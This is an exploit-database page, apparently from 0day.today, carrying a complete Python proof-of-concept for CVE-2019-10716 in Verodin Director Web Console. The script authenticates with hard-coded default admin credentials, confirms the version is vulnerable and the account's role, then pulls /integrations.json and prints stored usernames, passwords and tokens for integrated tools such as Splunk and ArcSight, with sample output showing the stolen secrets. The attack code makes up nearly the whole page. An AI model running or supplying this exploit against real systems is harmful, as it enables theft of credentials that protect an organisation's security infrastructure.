0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC) # Discovery Date: 2019-01-31 # Exploit Author: Nolan B. Kennedy (nxkennedy) # Vendor Homepage: https://www.verodin.com/ # Software Link : https://www.verodin.com/demo-request/demo-request-form # Tested Versions: v3.5.1.0, v3.5.2.0, v3.5.3.1 # Tested On: Windows # CVE: CVE-2019-10716 # Vulnerability Type: Sensitive Data Disclosure ### # Description: Verodin Director's REST API allows authenticated users to query the configuration # details, which include credentials, of any 50+ possible integrated security tools (e.g. Splunk, ArcSight, Palo Alto, AWS Cloud Trail). # Fortunately for attackers, members of 3 out of the 4 user groups in the Director can query this info (Users, Power Users, System Admin). # # API Request: GET https://<director-ip>/integrations.json # # Usage: python3 script.py # # Example Output: # # -- VERODIN DIRECTOR WEB CONSOLE < V3.5.4.0 - REMOTE AUTHENTICATED PASSWORD DISCLOSURE (POC) -- # -- Author: Nolan B. Kennedy (nxkennedy) -- # # # [+] Director Version # ===================== # [*] Detected version 3.5.1.0 is VULNERABLE! :) # # # [+] Account Permissions # ======================== # [*] "admin@verodin.com" is a member of "System Admin" # # # [+] Verodin Integrations # ========================= # [*] Product: splunk # [*] Username: splunk_svc_acct # [*] Misc (may include credentials): [{'scheme': 'https', 'basic': False, 'password': 'Sup3rP@ssw0rd', # 'port': 8089, 'host': '10.0.0.6', 'username': 'splunk_svc_acct'}, # {'proxy_hash': None}] # # [*] Product: arcsight # [*] Username: arcsight_admin # [*] Misc (may include credentials): ['10.0.0.7', 8443, 'https', 'arcsight_admin', 'Sup3rP@ssw0rd', # "/All Filters/Personal/integration_user's filters/Verodin Filter", 'Verodin Query Viewer', 60] # # [+] Done! ### import base64 from distutils.version import LooseVersion import json import re import ssl from sys import exit from time import sleep import urllib.request verodin_ip = '0.0.0.0' # Default System Admin creds. Worth a try. username = 'admin@verodin.com' password = 'Ver0d!nP@$$' base_url = 'https://{}'.format(verodin_ip) fixed_version = '3.5.4.0' # We'll be making 3 different requests so we need a web handling function def requests(target, html=False): url = base_url + target context = ssl._create_unverified_context() # so we don't get an ssl cert error req = urllib.request.Request(url) credentials = ('{}:{}'.format(username, password)) encoded_credentials = base64.b64encode(credentials.encode('ascii')) req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii")) # use %s instead of format because errors r = urllib.request.urlopen(req, context=context) content = r.read().decode('utf-8') if r.getcode() == 200: # we don't always get a 401 if auth fails if 'Cookies need to be enabled' in content: print('[!] Failed to retrieve data: Credentials incorrect/invalid') print() print('[!] Exiting...') exit(1) elif html: blob = content else: blob = json.loads(content) return blob elif r.getcode() == 401: print('[!] Failed to retrieve data: Credentials incorrect/invalid') print() print('[!] Exiting...') exit(1) else: print('[!] ERROR: Status Code {}'.format(r.getcode())) exit(1) # Do we have permissions to retrieve the creds? def getUserPerms(): target = '/users/user_prefs.json' r = requests(target) # returns a single json dict print('\n[+] Account Permissions') print('========================') group_id = r['user_group_id'] roles = {'Reporting': 4, 'Users': 3, 'Power Users': 2, 'System Admin': 1} for role,value in roles.items(): if group_id == value: print('[*] "{}" is a member of "{}"'.format(username, role)) print() if group_id == 4: print('[!] This account does not have sufficient privs. You need "Users" or higher.') print() print('[!] Exiting...') exit(1) sleep(0.5) # We need to verify the target Director is running a vulnerable version def checkVuln(): target = '/settings/system' r = requests(target, html=True) field = re.search(r'Director\sVersion:.*', r) version = field.group().split('<')[0].split(" ")[2] print('\n[+] Director Version') print('=====================') if LooseVersion(version) < LooseVersion(fixed_version): print('[*] Detected version {} is VULNERABLE! :)'.format(version)) print() else: print('[!] Detected version {} is not vulnerable. Must be < {}'.format(version, fixed_version)) print() print('[!] Exiting...') sleep(0.5) # Where we parse out any creds or other useful info def getLoot(): target = '/integrations.json' r = requests(target) # a list of json dicts print('\n[+] Verodin Integrations') print('=========================') if not r: print('[+] Dang! No integrations configured in this Director :(') print() else: for integration in r: product = integration['package_name'] # constant key misc = integration.get('new_client_args') # we use .get to return a None type if the key doesn't exist user = integration.get('username') passw = integration.get('password') token = integration.get('auth_token') print('[*] Product: {}'.format(product)) if user: print('[*] Username: {}'.format(user)) if passw: print('[*] Password: {}'.format(passw)) if token and token is not 'null': print('[*] Auth Token: {}'.format(token)) if misc: print('[*] Misc (may include credentials): {}'.format(misc)) print() sleep(0.5) def main(): print('\n-- Verodin Director Web Console < v3.5.4.0 - Remote Authenticated Password Disclosure (PoC) --'.upper()) print('-- Author: Nolan B. Kennedy (nxkennedy) --') print() checkVuln() getUserPerms() getLoot() print('[+] Done!') if __name__ == '__main__': main() # 0day.today [2024-11-15] #